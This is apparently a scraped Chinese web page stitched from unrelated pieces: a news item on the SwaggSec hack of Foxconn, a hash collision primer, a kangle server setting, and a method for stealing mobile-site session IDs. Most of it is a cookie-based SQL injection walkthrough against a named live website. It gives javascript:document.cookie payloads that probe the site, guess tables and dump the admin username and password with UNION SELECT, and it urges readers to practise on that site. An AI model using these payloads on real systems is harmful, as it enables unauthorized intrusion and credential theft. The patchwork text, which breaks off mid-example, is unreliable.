北京时间2月8日晚间消息，富士康服务器被一个称作“SwaggSec”的黑客组织攻击，并由此暴露出苹果、IBM等厂商的用户名和密码信息。

据称，该组织是出于对富士康恶劣的工作环境的声讨，也包括对传说中的iPhone 5的信息关注。

该组织直言，他们欢迎媒体、安全专家和其他有兴趣的团队来关注此次安全泄漏事件。而且，几乎没有遇到任何阻力就绕过了富士康防火墙，通过获取的用户名和信息，可以伪造IBM、苹果、微软等厂商的订单。

下面还是具体拿个实例来给大家演示下，目标站：http://www.ytop35.com/Products_show.asp?id=284

，同时也是注入点。我们首先要检测下按照平时的方式注入，在网址后面加 and 1=1。

  可见是使用了防注入系统的，但是目前我们是使用get方式提交的参数，那现在我们将“id=284”这个参数使用cookie提交看看程序对数据接收是否直接使用 request(“xx”)的方式？要更改成cookie方式提交，我们首先要访问正常的页面，即是：http://www.ytop35.com/Products_show.asp?id=284，等页面完全打开之后，我们将IE地址栏清空，然后写上:javascript:alert(document.cookie=”id=”+escape(“284″)); 这里的“id=”便是“Products_show.asp?id=284”中的“id=”，“escape(“284″)”中的“284”是“Products_show.asp?id=284”中的“id=284”了，这两处要根据实际情况来定义。

 现在更改好了cookie后我们就要试下能不能正常访问了，现在在另外一个窗口中我们打开以下地址：http://www.ytop35.com/Products_show.asp? 既是将“id=284”去掉后的，然后看是否能正常访问。

可见访问之后的页面与访问http://www.ytop35.com/Products_show.asp?id=284的时候是一样的，这样就说明程序在使用request对象获取数据的时候并未指明具体使用什么方法来获取，而是直接使用request(“xx”)的方式。现在cookie形成的一个重要因素已经明确了，接下来我们测试下能否提交特殊字符，看程序是否对数据进行过滤。我们再回到刚才更改cookie的页面，然后在IE地址栏处填写javascript:alert(document.cookie=”id=”+escape(“284 and 1=1″)); 回车后再去http://www.ytop35.com/Products_show.asp?页面刷新，看页面是否正常，如果正常我们再提交javascript:alert(document.cookie=”id=”+escape(“284 and 1=2″));   然后再去刷新，这个时候就会看见出错了。

很明显就能看到错误了，而且产品内容也米有显示，到此便可以确定该页面能使用cookie注入了，接下来来的利用过程就和普通注入一样了。我们可以使用union联合查询爆出管理员的账号和密码，但前提是需要知道管理员的表名和字段名，不过我们可以通过猜解。

       接下来我们提交:javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from manage”)); 发现有错误，我们再提交javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin”));发现返回正常页面。

 看到熟悉的画面了吧，这就表示网站数据库存在admin这个表，因我们之前一次提交的是javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from manage”));，数据库中不存在mange这个表，自然就出错了，使用更换from 处可以来猜解表明，那么现在我们在6和17的地方试试username和password看看提交后是否出错，如果出错那么就表示不存在username或者password字段。我们提交：javascript:alert(document.cookie=”id=”+escape(“284 union select 1,2,3,4,5,username,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin”));

可见，原来显示6和17的地方现在爆出了管理员的账号和密码了，不过这个密码破不出来，大家可以自己拿网站去练练。总的说来cookie注入和普通注入是一样的，只不过是在提交注入语句的过程不一样而已。如果对普通注入的原理又说了解的话，那么cookie注入也就不难了。

hash碰撞原理: 

Hash，简单来讲，是一种将任意长度的输入变换成固定长度的输出，固定长度的输出在”实际应用场景”下可以代表该输入。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。 

Hash函数的实现多种多样，在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数，通常所说的Hash函数是不带密钥的Hash函数。这里对Hash算法的实现原理不做更多的探讨。 
 
由于Hash固定长度输出的特性，必然会存在多个不同输入产生相同输出的情况。如果两个输入串的hash函数的值一样，则称这两个串是一个碰撞(Collision)。在理论范围内，存在一个输出串对应无穷多个输入串，所以碰撞具有其必然性。 

如果找到碰撞，那么意味着我们可以破坏信息的一致性而不被接收方察觉，搜寻指定输入的Hash碰撞值的过程被称作”Hash破解”。这里需要说明的 是，Hash函数必须是不可逆的，所以不存在从散列值到原始输入的破解（这里不包括暴力破解，使用彩虹表是暴力破解的最佳方式，但是仍然无法保证破解到的 数据是原始数据）。设计不良的Hash算法，很容易让人找到碰撞值。 

kangle web服务器 是一款跨平台、功能强大、安全稳定、易操作的、高性能的、国产开源的web服务器和反向代理服务器软件。简称：kangle 
除此：kangle也是一款专为做虚拟主机研发的web服务器。实现虚拟主机独立进程、独立身份运行。用户之间安全隔离，一个用户出问题不影响其他用户。安全支持php、asp、asp.net、java、ruby等多种动态开发语言。 

kangle 2.7.5新增一个最大post参数，轻松防住这个漏洞。进入kangle管理后台3311设置。点左边配置==>数据交换，出现如下界面。如图: 

最多POST参数,这里为了测试只写2，一般建议输入500，即可。使用本功能，一定要打开使用临时文件。否则无效。效果图: 

　　不过手机网站也有漏洞

　　比如 不用XSS即可盗取sid 之后登录。

　　来做个比喻，比如广州电脑培训的学生在某个手机网站注册之后是 XXX.COM/?sid=123123123

　　当然猜是不可能了

　　这就要借助网站日志的来路记录

　　在这个论坛评个论，内容是http://www.safe121.com，发表出去，URL被转换成连接了

　　让人点击了，他的SID就被日志记录下来了(来路)

　　所以这就产生了跳过验证，以前QQ邮箱就有这个问题

　　举个例子,我写了个记录来路的php: